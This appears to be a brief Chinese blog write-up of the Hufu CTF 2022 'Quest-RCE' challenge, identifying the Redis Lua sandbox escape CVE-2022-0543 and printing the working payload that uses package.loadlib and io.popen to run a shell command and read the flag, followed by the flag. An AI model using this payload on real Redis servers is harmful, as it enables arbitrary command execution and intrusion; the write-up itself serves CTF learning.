发表更新CTF-WP1 分钟读完 (大约128个字)

虎符CTF2022 WP Quest-RCE

Misc

Quest-RCE

查看题目并进行搜索发现这是Redis 沙盒逃逸漏洞,CVE-2022-0543。

参考:https://www.adminxe.com/3620.html,利用package提供的方法加载动态链库的函数,进行任意命令执行。

payload如下:

1
{"query":"SET \"dir\" \"/var/www/uploads/\" \n eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /flag_UVEmnDKY4VHyUVRVj46ZeojgfZpxzG\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0"}

flag: HFCTF{34da8018-8720-42a0-95db-773a452ff1ee}

虎符CTF2022 WP Quest-RCE

http://localhost:4000/2022/03/20/虎符CTF2022-WP-Quest-RCE/

作者

hututu

发布于

2022-03-20

更新于

2024-03-20

许可协议

#

评论

关注我

分类

最新文章

归档

标签

ctf15
java3
云攻防1
协议1

链接

×